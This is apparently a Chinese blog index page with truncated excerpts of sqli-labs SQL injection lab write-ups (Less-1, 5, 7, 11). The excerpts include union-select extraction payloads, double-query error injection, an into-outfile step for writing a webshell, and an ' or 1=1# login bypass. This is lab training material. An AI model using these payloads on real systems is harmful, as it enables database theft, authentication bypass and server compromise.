KRDecad3的博客

Less-1-GET-Error based-Single quotes-String输入?id=1'报错，推测后台查询语句是字符型判断列数：?id=1' order by 3--+?id=1' order by 4--+判断回显位：?id=-1' union select 1,2,3--+暴数据库名：?id=-1' union select 1,user(),datab...

Less-5-GET-Double Injection-Single Quote-String这里考察的叫“双注入”，也有叫“双查询注入”，顾名思义，注入语句里有两条查询语句。详细原理：https://www.2cto.com/article/201303/192718.html输入?id=1'报错输入?id=1不再显示用户名和密码了：这里要尝试报错注入。报错注入语句的公式如下：...

Less-7-GET-Dump into outfile-String考查into outfile写入文件输入id=1输入id=1'报错输入id=1"不报错，说明是单引号输入id=1'--+报错，那么再试试id=1')--+还报错，再试试id=1'))--+正常，由此判断查询语句的参数是(('$_GET[id]'))的形式。使用into outfile写入一句话：输入id=-...

Less-11-POST-Error Based-Single quotes-Stringusername栏输入一个单引号报错：说明查询语句有username='$_POST[username]' and password='$_POST[password]'，查询有两个字段username栏输入' or 1=1#提交，绕过登陆验证，并且知道两处可以回显。构造查询数据库名：'...